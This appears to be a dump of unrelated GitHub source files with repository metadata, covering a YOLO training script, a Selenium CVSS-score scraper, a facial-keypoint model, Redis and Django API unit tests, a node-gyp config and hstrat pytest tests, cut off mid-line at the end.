from yolo3.tinymodel import preprocess_true_boxes, tiny_yolo_body, yolo_loss
from yolo3.utils import get_random_data
def _main():
annotation_path = '/.../KITTI/train.txt' # load the path of train set
log_dir = '/.../model_data/' # define the path to save the model data
classes_path = '/.../model_data/object_classes.txt' # load the classes of objects
anchors_path = '/.../model_data/tiny_yolo_anchors.txt' # load the anchors data
class_names = get_classes(classes_path)
anchors = get_anchors(anchors_path)
input_shape = (416,416) # define the size of input image
model = create_model(input_shape, anchors, len(class_names)) # establish the structure of model
train(model, annotation_path, input_shape, anchors, len(class_names), log_dir=log_dir) # train the model
def train(model, annotation_path, input_shape, anchors, num_classes, log_dir='logs/'):
model.compile(optimizer='adam', loss={
'yolo_loss': lambda y_true, y_pred: y_pred})
tensorboard = TensorBoard(log_dir=log_dir)
checkpoint = ModelCheckpoint(log_dir + "best_weights.h5",
monitor="val_loss",
mode='min',
save_weights_only=False,
save_best_only=False,
verbose=1,
period=1)
callback_lists=[tensorboard,checkpoint]
batch_size = 64
val_split = 0.05
with open(annotation_path) as f:
lines = f.readlines()
np.random.shuffle(lines)
num_val = int(len(lines)*val_split)
num_train = len(lines) - num_val
print('Train on {} samples, val on {} samples, with batch size {}.'.format(num_train, num_val, batch_size))
model.fit_generator(data_generator_wrap(lines[:num_train], batch_size, input_shape, anchors, num_classes),
steps_per_epoch=max(1, num_train//batch_size),
validation_data=data_generator_wrap(lines[num_train:], batch_size, input_shape, anchors, num_classes),
validation_steps=max(1, num_val//batch_size),
epochs=30, # set epochs
initial_epoch=0, callbacks=callback_lists, verbose=1)
model.save(log_dir + 'tiny_yolo.h5')
model.save_weights(log_dir + 'tiny-trained.weights')
def get_classes(classes_path):
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def get_anchors(anchors_path):
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def create_model(input_shape, anchors, num_classes, load_pretrained=False, freeze_body=False,
weights_path='/.../model_data/best_weights.h5'):
K.clear_session() # get a new session
image_input = Input(shape=(None, None, 3))
h, w = input_shape
num_anchors = len(anchors)
y_true = [Input(shape=(h//{0:32, 1:16}[l], w//{0:32, 1:16}[l], num_anchors//3, num_classes+5)) for l in range(2)]
model_body = tiny_yolo_body(image_input, num_anchors//3, num_classes)
print('Create YOLOv3 model with {} anchors and {} classes.'.format(num_anchors, num_classes))
if load_pretrained:
model_body.load_weights(weights_path, by_name=False, skip_mismatch=True)
print('Load weights {}.'.format(weights_path))
if freeze_body:
# Do not freeze 3 output layers.
num = len(model_body.layers)-7
for i in range(num): model_body.layers[i].trainable = False
print('Freeze the first {} layers of total {} layers.'.format(num, len(model_body.layers)))
# define the loss function
model_loss = Lambda(yolo_loss, output_shape=(1,), name='yolo_loss',
arguments={'anchors': anchors, 'num_classes': num_classes, 'ignore_thresh': 0.5})(
[*model_body.output, *y_true])
model = Model([model_body.input, *y_true], model_loss)
return model
def data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes):
n = len(annotation_lines)
print(n)
np.random.shuffle(annotation_lines)
i = 0
while True:
image_data = []
box_data = []
for b in range(batch_size):
i %= n
image, box = get_random_data(annotation_lines[i], input_shape, random=False)
#image = cv2.resize(image, (224, 224))
image_data.append(image)
box_data.append(box)
i += 1
image_data = np.array(image_data)
box_data = np.array(box_data)
y_true = preprocess_true_boxes(box_data, input_shape, anchors, num_classes)
yield [image_data, *y_true], np.zeros(batch_size)
def data_generator_wrap(annotation_lines, batch_size, input_shape, anchors, num_classes):
n = len(annotation_lines)
if n==0 or batch_size<=0: return None
return data_generator(annotation_lines, batch_size, input_shape, anchors, num_classes)
if __name__ == '__main__':
_main()
| [
"noreply@github.com"
] | noreply@github.com |
7783d9c426e2ee2332c1ba6930383030038a5c3e | ad6f20ca36dc65e34b43c69db66f383554718fed | /already_asked_questions/bridged/V0/webscrapping_selenium.py | 4f072b6e3aeb36b938b5851bd533e9e9e98a6b03 | [] | no_license | atulanandnitt/questionsBank | 3df734c7389959801ab6447c0959c85f1013dfb8 | 477accc02366b5c4507e14d2d54850a56947c91b | refs/heads/master | 2021-06-11T21:39:24.682159 | 2021-05-06T17:54:18 | 2021-05-06T17:54:18 | 175,861,522 | 0 | 1 | null | 2020-05-02T09:26:25 | 2019-03-15T17:10:06 | Python | UTF-8 | Python | false | false | 470 | py | from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chrome_options = Options()
chrome_options.add_argument("--headless")
url ="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:A/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:L"
d = webdriver.Chrome(chrome_options=chrome_options)
d.get(url)
print(d.find_element_by_css_selector("#cvss-overall-score-chart > div.jqplot-point-label.jqplot-series-0.jqplot-point-0").text)
d.quit()
| [
"atul.anand.nitt"
] | atul.anand.nitt |
1a0d279e90e4a7293faf975c284a15a6bfa3eb66 | f93e413230460cf86f35cd0bc5db74fed9539efb | /fkd-specials.py | 6acadf53b1e0f238195f4046d3b76d49b61d8f1a | [] | no_license | danielevian/facial-keypoints-detection-keras | 34045eb66092fd003ad10fc964956d0958db2296 | 2ec2ae4b31a0c588db0d85a50085d7546c105930 | refs/heads/master | 2021-01-12T09:30:08.002992 | 2016-12-13T15:41:06 | 2016-12-13T15:41:06 | 76,171,640 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,966 | py | from __future__ import print_function
import numpy as np
from keras.models import Sequential, load_model
from keras.layers import Dense, Activation, Dropout, Convolution2D, MaxPooling2D, Flatten
from keras.optimizers import Adam
import h5py
import matplotlib.pyplot as plt
from pandas import read_csv
import pandas as pd
import math
#### TRAINING DATA
dataframe = read_csv("training.csv")
dataframe_wo_na = dataframe.dropna() # I'm wasting a LOT of training data!!
## 1. BASE MODEL
image_data = dataframe_wo_na["Image"].apply(lambda im: np.fromstring(im, sep = ' '))
X_train = np.vstack(image_data.values) / 255.
X_train = X_train.astype(np.float32)
y_train = (dataframe_wo_na[dataframe_wo_na.columns[:-1]] - 48) / 48
X_train = X_train.reshape(-1,1,96,96) # to get into conv layer
# --> model = load_model('fkd-1.h5')
model = Sequential()
model.add(Convolution2D(16, 2,2, subsample=(1,1), border_mode='same',input_shape = (1,96,96)))
model.add(Activation('relu'))
model.add(MaxPooling2D((2,2), (1,1), border_mode='same'))
model.add(Convolution2D(16, 3,3, subsample=(1,1),border_mode='same'))
model.add(Activation('relu'))
model.add(Dropout(0.3))
model.add(Flatten())
model.add(Dense(100))
model.add(Activation('relu'))
model.add(Dropout(0.3))
model.add(Dense(30))
model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mean_squared_error'])
history = model.fit(X_train, y_train.values, batch_size = 64, nb_epoch = 200, shuffle = True, validation_split = 0.3) # › 1.7306
model.save('fkd-base.h5')
## then i run the "special" detectors
history = []
for i in range(0,30,2): # for every feature
model = Sequential()
model.add(Convolution2D(16, 2,2, subsample=(1,1), border_mode='same',input_shape = (1,96,96)))
model.add(Activation('relu'))
model.add(MaxPooling2D((2,2), (1,1), border_mode='same'))
model.add(Dropout(0.3))
model.add(Convolution2D(16, 3,3, subsample=(1,1),border_mode='same'))
model.add(Activation('relu'))
model.add(MaxPooling2D((2,2), (1,1), border_mode='same'))
model.add(Dropout(0.3))
model.add(Convolution2D(32, 2,2, subsample=(2,2),border_mode='same'))
model.add(Activation('relu'))
model.add(Dropout(0.3))
model.add(Flatten())
model.add(Dense(80))
model.add(Activation('relu'))
model.add(Dropout(0.3))
model.add(Dense(2))
model.compile(loss='mean_squared_error', optimizer='adam', metrics=['mean_squared_error'])
df = dataframe.iloc[:,i:i+2].join(dataframe["Image"]).dropna()
image_data = df["Image"].apply(lambda im: np.fromstring(im, sep = ' '))
X_train = np.vstack(image_data.values) / 255.
X_train = X_train.astype(np.float32)
y_train = (df[df.columns[:-1]] - 48) / 48
X_train = X_train.reshape(-1,1,96,96) # to get into conv layer
history.append(model.fit(X_train, y_train.values, batch_size = 64, nb_epoch = 200, shuffle = True))
model.save("fkd--{0}.h5".format(i))
## ALRIGHT: Now that I have ma model, Imma predict and save submission for y'all.
test = read_csv('test.csv')
# test.columns => Index(['ImageId', 'Image'], dtype='object')
id_lookup_table = read_csv('IdLookupTable.csv')
# id_lookup_table.columns => Index(['RowId', 'ImageId', 'FeatureName', 'Location'], dtype='object')
submission = read_csv('SampleSubmission.csv')
submission['Location'] = submission['Location'].astype(np.float32)
cols = ['ImgId', 'left_eye_center_x','left_eye_center_y','right_eye_center_x','right_eye_center_y','left_eye_inner_corner_x','left_eye_inner_corner_y','left_eye_outer_corner_x','left_eye_outer_corner_y','right_eye_inner_corner_x','right_eye_inner_corner_y','right_eye_outer_corner_x','right_eye_outer_corner_y','left_eyebrow_inner_end_x','left_eyebrow_inner_end_y','left_eyebrow_outer_end_x','left_eyebrow_outer_end_y','right_eyebrow_inner_end_x','right_eyebrow_inner_end_y','right_eyebrow_outer_end_x','right_eyebrow_outer_end_y','nose_tip_x','nose_tip_y','mouth_left_corner_x','mouth_left_corner_y','mouth_right_corner_x','mouth_right_corner_y','mouth_center_top_lip_x','mouth_center_top_lip_y','mouth_center_bottom_lip_x','mouth_center_bottom_lip_y']
features = pd.DataFrame(columns=cols, index=range(test.shape[0]))
for j in range(0,30,2):
print("model {0}".format(j))
model = load_model("fkd--{0}.h5".format(j))
h = 0
for imageId, imageData in test.values:
print("# {0}".format(imageId))
image = np.array(imageData.split()).astype(np.float32) / 255.0
y = model.predict(image.reshape(1,1,96,96), verbose=0)
y = y*48 + 48
if features.loc[lambda df: df.ImgId == imageId].shape[0] == 0:
features.iloc[h]['ImgId'] = imageId
h += 1
features.loc[lambda df: df.ImgId == imageId, cols[j+1]:cols[j+2]] = y
q = "ImageId == {0}".format(imageId)
rows = id_lookup_table.query(q)
for rowid, image_id, feature_name, location in rows.values:
a = submission.set_value(rowid - 1, 'Location', features.loc[lambda df: df.ImgId == image_id, feature_name])
submission.dropna()
out = submission['Location']
out = pd.DataFrame(out)
out.to_csv('submission-4.csv', index='RowId')
| [
"daniele@misiedo.com"
] | daniele@misiedo.com |
b757933424dbae9f916e93a4298ec35fe9220b03 | a2c3eb07ed4ed7beba217e61bece352881c0bef6 | /projeto2/antlr4-python3-runtime-4.7.2/src/autogen/GrammarCheckerVisitor.py | ffbec44629ea4f004820cfe0b7c143a88c44fa77 | [] | no_license | samuelbrasileiro/compiladores | d47a044e84e70f9f991e991cfed9b108dc25aa6a | 7408ebfde130b7114a7d0f2d60f0480ad0e0f03c | refs/heads/master | 2023-05-03T18:29:08.948046 | 2021-05-17T13:44:21 | 2021-05-17T13:44:21 | 349,994,460 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 33 | py | ../../../GrammarCheckerVisitor.py | [
"samuelbsantosn@gmail.com"
] | samuelbsantosn@gmail.com |
be44df7fee11dfc53e80ffa6769c71965ba34ccc | 864312a2184d0c9ac73b6b5d962bd0f34bf9ee42 | /redisdemo.py | 20eec91d23270d4cda098c80785514edd50fbd3d | [] | no_license | erikdejonge/redisdemo | e1250f1829ed042638d64409c2426469006f40f1 | 5ded8ab6cf986a19f46010b934abe9a5142f7d9b | refs/heads/master | 2020-04-20T09:24:41.420048 | 2019-02-25T16:13:32 | 2019-02-25T16:13:32 | 168,764,872 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,524 | py | # coding=utf-8
"""
Testscript for redis
"""
import unittest
import random
import time
import redis
from multiprocessing import Pool, Process
REDISHOST = '127.0.0.1'
# noinspection PyUnusedLocal
def return_redis_mylist(counter):
"""
pop one item from the beginning of the list
"""
global REDISHOST
# decode responses is for utf8 return values
remoterediscon = redis.Redis(host=REDISHOST, decode_responses=True)
return remoterediscon.lpop("mylist")
class RedisTest(unittest.TestCase):
"""
redis
"""
rcon = None
def setUp(self):
"""
setUp
"""
global REDISHOST
self.REDISHOST = REDISHOST
# make connection attribute, decode responses is for utf8 return values
self.rcon = redis.Redis(host=self.REDISHOST, decode_responses=True)
def test_make_conn(self):
"""
connection should be made by now
"""
self.assertIsNotNone(self.rcon)
def test_scalar_string_no_driver_decoding(self):
"""
setting and getting of a single string
"""
# without decode_responses we get bytestrings
self.rcon = redis.Redis(host=self.REDISHOST)
# in case of failed tests
self.rcon.delete("mystr")
thestr = "Hello world! 🙂"
self.rcon.set("mystr", thestr)
mystr = self.rcon.get("mystr")
# Carefull: redis returns binary strings (not encoded)
self.assertNotEqual(thestr, mystr)
# decode to the default (utf8)
mystr = mystr.decode()
# now they should be equal
self.assertEqual(thestr, mystr)
def test_scalar_string(self):
"""
setting and getting of a single string
"""
# in case of failed tests
self.rcon.delete("mystr")
thestr = "Hello world! 🙂"
self.rcon.set("mystr", thestr)
mystr = self.rcon.get("mystr")
# now they should be equal
self.assertEqual(thestr, mystr)
def test_scalar_int(self):
"""
set and get integer
"""
# in case of failed tests
self.rcon.delete("somenumber")
# a random int as the value
randomnumber = random.randint(-100, 100)
self.rcon.set("somenumber", randomnumber)
# Be carefull all data is stored as a string
somenumber = self.rcon.get("somenumber")
self.assertNotEqual(somenumber, randomnumber)
# cast the string to an int
somenumber = int(somenumber)
self.assertEqual(somenumber, randomnumber)
# delete key
self.rcon.delete("somenumber")
# shoyld return None now
somenumber = self.rcon.get("somenumber")
self.assertIsNone(somenumber)
def test_counters(self):
"""
set a counter (atomic)
"""
# make a counter by increasing it with startnumber
self.rcon.delete("mycounter")
self.rcon.incr("mycounter", 2)
self.assertEqual(int(self.rcon.get("mycounter")), 2)
self.rcon.incr("mycounter", 2)
self.rcon.incr("mycounter", 4)
self.assertEqual(int(self.rcon.get("mycounter")), 8)
def test_list(self):
"""
test a list, this is like a global list and atomic, multiple programs can pop this
"""
self.rcon.delete("mylist")
# first in last out list
self.rcon.lpush("mylist", "🙂")
self.rcon.lpush("mylist", "world!")
self.rcon.lpush("mylist", "Hello")
self.assertEqual(self.rcon.llen("mylist"), 3)
# get the list as a whole
# getting it as scalar throws exception
with self.assertRaises(redis.exceptions.ResponseError):
self.rcon.get("mylist")
# left pop the list untill its empty
mylist = []
spart = self.rcon.lpop("mylist")
while spart:
mylist.append(spart)
spart = self.rcon.lpop("mylist")
mystring = " ".join(mylist)
self.assertEqual(mystring, "Hello world! 🙂")
def test_list_smp(self):
"""
pop a list from multiple processes
"""
self.rcon.delete("mylist")
# a local and a redis with 100 random numbers
verifylist = []
for i in range(0, 100):
rnum = random.randint(0, 100)
verifylist.append(rnum)
self.rcon.lpush("mylist", rnum)
# call the popitem method a 100 times
pool = Pool(processes=4)
returnedlist = pool.map(return_redis_mylist, range(0, 100))
returnedlist = sorted([int(val) for val in returnedlist])
# sort both lists, should be the same
verifylist.sort()
self.assertEqual(returnedlist, verifylist)
def test_hash(self):
"""
Hash items are like dictionaries
"""
self.rcon.delete("mydict")
# set the dict (dictname, key value)
self.rcon.hset("mydict", "naam", "adisor")
self.rcon.hset("mydict", "city", "rotterdam")
# the redis driver returns a dict
mydict = {"naam": "adisor",
"city": "rotterdam"}
self.assertEqual(self.rcon.hgetall("mydict"), mydict)
def test_set(self):
"""
a set is a unique list like in python
"""
self.rcon.delete("myset")
myset = set()
for i in [1, 2, 2, 2, 3, 3, 3, 4, 4, 4, 4, 5, 5]:
myset.add(i)
self.rcon.sadd("myset", i)
# seeems to return it as a list
rmyset = sorted([int(val) for val in self.rcon.smembers("myset")])
mysetlist = list(myset)
self.assertEqual(mysetlist, rmyset)
def test_pubsub(self):
"""
"""
self.rcon.delete("mylist")
def pub(myredis):
"""
this is a publisher, can be whatever event, could for example be a click somewhere in javascript
"""
for n in range(5):
myredis.publish('myevents', 'the number is %d' % n)
time.sleep(0.01)
def sub(myredis, name):
"""
This is the subscriber method, this method is waiting around in a Process
could be something like a cronjob, or just a good way to propate an event
instead of functions calling each other, since that could lead to tight coupling.
A microservice architecture would be a perfect fit, mini webservices working together
with redis as the working memory.
"""
pubsub = myredis.pubsub()
# can subscribe to multiple events
pubsub.subscribe(['myevents', 'myotherevents'])
# an item is a dict with the following keys, type, pattern, channel, data
# in this case it looks something like this
# {'type': 'message',
# 'pattern': None,
# 'channel': 'myevents',
# 'data': 'the number is 4'}
for item in pubsub.listen():
# push the received item in a shared list on redis.
myredis.lpush("mylist", str(name) + ": " + str(item['data']))
# start the publisher (user clicking on a button or program notifying that it's done)
p0 = Process(target=pub, args=(self.rcon,))
p0.start()
# start two subscribers
p1 = Process(target=sub, args=(self.rcon, 'reader1'))
p1.start()
# the just catch the data and push it in a shared list
p2 = Process(target=sub, args=(self.rcon, 'reader2'))
p2.start()
# wait a little while, there is a small delay between the events
time.sleep(0.2)
# process are killed now, in real life they could be still running for example cronjobs?
p0.terminate()
p1.terminate()
p2.terminate()
# loop the redislist and make a normal list
mylist = []
while self.rcon.llen('mylist') != 0:
mylist.append(self.rcon.lpop("mylist"))
mylist.sort()
listtocheck = ['reader1: 1', 'reader1: 2', 'reader1: the number is 1', 'reader1: the number is 2', 'reader1: the number is 3', 'reader1: the number is 4', 'reader2: 1', 'reader2: 2', 'reader2: the number is 1', 'reader2: the number is 2', 'reader2: the number is 3', 'reader2: the number is 4']
self.assertEqual(mylist, listtocheck)
def main():
"""
run unittests
"""
unittest.main()
if __name__ == '__main__':
main()
| [
"rabshakeh@xanthos-2.local"
] | rabshakeh@xanthos-2.local |
b9447235a9f1441e7e0f13347182a735b12dbb79 | e29c9744a714da2705d76047e56b8d9ae3607ec8 | /api/apps/pokemons/api/v1/tests.py | ef7f958d7ab3aeb45d8f009e4b694894e095b0b2 | [] | no_license | medinan/ixpandit-tests | d27c0c815b0cde345bd99a0896b2d2a5bab524dd | bd7a6fd02efc33f6c057983d866af205ba2d6f26 | refs/heads/main | 2023-09-03T20:12:00.759333 | 2021-11-01T20:52:43 | 2021-11-01T20:52:43 | 421,535,190 | 0 | 0 | null | 2021-11-01T20:52:44 | 2021-10-26T18:11:37 | CSS | UTF-8 | Python | false | false | 2,369 | py | from rest_framework import status
from rest_framework.test import APITestCase
from utils.tests.mixins.factories import UserFactory
from utils.tests.mixins.simple_api import SimpleAPITestCaseMixin
from ...tests.factories import PokemonFactory
class PokemonAnonymousUserAPITestCase(SimpleAPITestCaseMixin, APITestCase):
factory_class = PokemonFactory
base_name_api = "pokemons"
authenticate_user = False
def test_list(self):
response = self.case_list()
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_detail(self):
response = self.case_detail()
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_create(self):
response = self.case_create()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_delete(self):
response = self.case_delete()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_update(self):
response = self.case_update()
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class PokemonAuthenticatedUser(SimpleAPITestCaseMixin, APITestCase):
factory_class = PokemonFactory
base_name_api = "pokemons"
authenticate_user = True
def create_user(self):
return UserFactory.create()
def get_data_to_create_object(self):
return {
"name": "Picachu",
"poke_id": 152,
"height": 350.00,
"weight": 450.77,
"image": "https://www.imagenes.com/image.png",
}
def get_data_to_update_object(self):
return {"name": "Pikachu"}
def test_list(self):
response = self.case_list()
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_detail(self):
response = self.case_detail()
self.assertEqual(response.status_code, status.HTTP_200_OK)
def test_create(self):
response = self.case_create()
self.assertEqual(
response.status_code, status.HTTP_201_CREATED, response.__dict__
)
def test_delete(self):
response = self.case_delete()
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_update(self):
response = self.case_update()
self.assertEqual(response.status_code, status.HTTP_200_OK)
| [
"noreply@github.com"
] | noreply@github.com |
50ae2b79f3722abd6f8e9deec39e107c7e331cb3 | 6ae36417415bfe9aafa4daa98c00ee7407f88f01 | /golabs/gocloud/gumball/nodejs/gumball_v6/node_modules/kerberos/build/config.gypi | 47735b99ef72a8cd4c4a8f9faeea2812627d6210 | [
"Apache-2.0"
] | permissive | pkouda/cmpe281 | 9992f7ec725dad9afc0c9144d677018f8077cddd | 8ef8133b4e69b8e3fdb5ad392d6f101edbadb8ce | refs/heads/master | 2021-05-08T15:45:10.712851 | 2018-02-03T06:05:19 | 2018-02-03T06:05:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,980 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"coverage": "false",
"debug_devtools": "node",
"debug_http2": "false",
"debug_nghttp2": "false",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_file": "icudt59l.dat",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt59l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "59",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 57,
"node_no_browser_globals": "false",
"node_prefix": "/usr/local",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_v8_platform": "true",
"node_without_node_options": "false",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "57.dylib",
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_enable_inspector": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_promise_internal_field_count": 1,
"v8_random_seed": 0,
"v8_trace_maps": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/pnguyen/.node-gyp/8.9.0",
"standalone_static_library": 1,
"dry_run": "",
"legacy_bundling": "",
"save_dev": "",
"browser": "",
"commit_hooks": "true",
"only": "",
"viewer": "man",
"also": "",
"rollback": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/bash",
"metrics_registry": "https://registry.npmjs.org/",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"timing": "",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"fetch_retries": "2",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"logs_max": "10",
"prefer_online": "",
"cache_lock_retries": "10",
"global_style": "",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"offline": "",
"read_only": "",
"searchlimit": "20",
"access": "",
"json": "",
"allow_same_version": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/pnguyen/.npm-init.js",
"userconfig": "/Users/pnguyen/.npmrc",
"cidr": "",
"node_version": "8.9.0",
"user": "",
"auth_type": "legacy",
"editor": "vi",
"ignore_prepublish": "",
"save": "true",
"script_shell": "",
"tag": "latest",
"global": "",
"progress": "true",
"ham_it_up": "",
"optional": "true",
"searchstaleness": "900",
"bin_links": "true",
"force": "",
"save_prod": "",
"searchopts": "",
"depth": "Infinity",
"rebuild_bundle": "true",
"sso_poll_frequency": "500",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"scripts_prepend_node_path": "warn-only",
"sso_type": "oauth",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"prefer_offline": "",
"version": "",
"cache_min": "10",
"otp": "",
"cache": "/Users/pnguyen/.npm",
"searchexclude": "",
"color": "true",
"package_lock": "true",
"save_optional": "",
"user_agent": "npm/5.5.1 node/v8.9.0 darwin x64",
"ignore_scripts": "",
"cache_lock_wait": "10000",
"production": "",
"save_bundle": "",
"send_metrics": "",
"init_version": "1.0.0",
"umask": "0022",
"scope": "",
"git": "git",
"init_author_name": "",
"onload_script": "",
"tmp": "/var/folders/qv/f6jwf0792tn89p5fnqx5c6g80000gn/T",
"unsafe_perm": "true",
"link": "",
"prefix": "/usr/local"
}
}
| [
"paul.nguyen@sjsu.edu"
] | paul.nguyen@sjsu.edu |
b1e7bc2ea6a672534d6f1fe70f55d35439a84b1f | cd40b7cc395f36740000ed4a4144b1c0666ab0fd | /tests/test_hstrat/test_stratum_retention_strategy/test_stratum_retention_algorithms/test_recency_proportional_resolution_algo/test_IterRetainedRanks.py | e25d30f8fbb8105935530e3c749ac1f26bb0365f | [
"MIT"
] | permissive | mmore500/hstrat | 94fd22c86a87a5707590b9398ef679444ed82d6d | b2d2caded1db5e2dc681d9f171d7c74b322c55c3 | refs/heads/master | 2023-08-31T03:36:44.457576 | 2023-08-25T14:39:29 | 2023-08-25T14:39:29 | 464,531,144 | 5 | 2 | NOASSERTION | 2023-08-25T13:07:52 | 2022-02-28T15:11:45 | Python | UTF-8 | Python | false | false | 7,230 | py | import itertools as it
import numbers
from iterpop import iterpop as ip
import numpy as np
import pytest
from hstrat._auxiliary_lib import all_same, pairwise
from hstrat.hstrat import recency_proportional_resolution_algo
@pytest.mark.parametrize(
"recency_proportional_resolution",
[
0,
1,
2,
3,
7,
],
)
@pytest.mark.parametrize(
"time_sequence",
[
range(10**3),
(i for i in range(10**2) for __ in range(2)),
np.random.default_rng(1).integers(
low=0,
high=2**32,
size=10,
),
(2**32,),
],
)
def test_impl_consistency(recency_proportional_resolution, time_sequence):
policy = recency_proportional_resolution_algo.Policy(
recency_proportional_resolution
)
spec = policy.GetSpec()
impls = [
*recency_proportional_resolution_algo._scry._IterRetainedRanks_.impls
]
instances = [impl(spec) for impl in impls] + [
lambda __, num_strata_deposited: policy.IterRetainedRanks(
num_strata_deposited
)
]
for num_strata_deposited in time_sequence:
assert all_same(
it.chain(
(
list(
impl(spec)(
policy,
num_strata_deposited,
)
)
for impl in impls
),
(
list(
instance(
policy,
num_strata_deposited,
)
)
for instance in instances
),
)
)
@pytest.mark.parametrize(
"impl",
recency_proportional_resolution_algo._scry._IterRetainedRanks_.impls,
)
@pytest.mark.parametrize(
"recency_proportional_resolution",
[
0,
1,
2,
3,
7,
42,
97,
100,
],
)
@pytest.mark.parametrize(
"time_sequence",
[
range(10**3),
(i for i in range(10**2) for __ in range(2)),
np.random.default_rng(1).integers(
low=0,
high=2**32,
size=10,
),
(2**32,),
],
)
def test_only_dwindling_over_time(
impl, recency_proportional_resolution, time_sequence
):
policy = recency_proportional_resolution_algo.Policy(
recency_proportional_resolution
)
spec = policy.GetSpec()
instance = impl(spec)
for num_strata_deposited in time_sequence:
for which in (instance, impl(spec)):
cur_set = {
*which(
policy,
num_strata_deposited,
)
}
next_set = {
*which(
policy,
num_strata_deposited + 1,
)
}
assert cur_set.issuperset(next_set - {num_strata_deposited})
@pytest.mark.parametrize(
"impl",
recency_proportional_resolution_algo._scry._IterRetainedRanks_.impls,
)
@pytest.mark.parametrize(
"recency_proportional_resolution",
[
0,
1,
2,
3,
7,
42,
97,
100,
],
)
@pytest.mark.parametrize(
"time_sequence",
[
range(10**3),
(i for i in range(10**2) for __ in range(2)),
np.random.default_rng(1).integers(
low=0,
high=2**32,
size=10,
),
(2**32,),
],
)
def test_ranks_sorted_and_unique(
impl, recency_proportional_resolution, time_sequence
):
policy = recency_proportional_resolution_algo.Policy(
recency_proportional_resolution
)
spec = policy.GetSpec()
instance = impl(spec)
for num_strata_deposited in time_sequence:
for which in (instance, impl(spec)):
assert all(
i < j
for i, j in pairwise(
which(
policy,
num_strata_deposited,
)
)
)
@pytest.mark.parametrize(
"impl",
recency_proportional_resolution_algo._scry._IterRetainedRanks_.impls,
)
@pytest.mark.parametrize(
"recency_proportional_resolution",
[
0,
1,
2,
3,
7,
42,
97,
100,
],
)
@pytest.mark.parametrize(
"time_sequence",
[
range(10**3),
(i for i in range(10**2) for __ in range(2)),
np.random.default_rng(1).integers(
low=0,
high=2**32,
size=10,
),
(2**32,),
],
)
def test_zero_and_last_ranks_retained(
impl, recency_proportional_resolution, time_sequence
):
policy = recency_proportional_resolution_algo.Policy(
recency_proportional_resolution
)
spec = policy.GetSpec()
instance = impl(spec)
for num_strata_deposited in time_sequence:
for which in instance, impl(spec):
res = which(
policy,
num_strata_deposited,
)
if num_strata_deposited > 1:
first, *middle, last = res
assert first == 0
assert last == num_strata_deposited - 1
elif num_strata_deposited == 1:
assert ip.popsingleton(res) == 0
else:
assert next(res, None) is None
@pytest.mark.parametrize(
"impl",
recency_proportional_resolution_algo._scry._IterRetainedRanks_.impls,
)
@pytest.mark.parametrize(
"recency_proportional_resolution",
[
0,
1,
2,
3,
7,
42,
97,
100,
],
)
@pytest.mark.parametrize(
"time_sequence",
[
range(10**3),
(i for i in range(10**2) for __ in range(2)),
np.random.default_rng(1).integers(
low=0,
high=2**32,
size=10,
),
(2**32,),
],
)
def test_ranks_valid(impl, recency_proportional_resolution, time_sequence):
policy = recency_proportional_resolution_algo.Policy(
recency_proportional_resolution
)
spec = policy.GetSpec()
instance = impl(spec)
for num_strata_deposited in time_sequence:
for which in (instance, impl(spec)):
assert all(
isinstance(r, numbers.Integral)
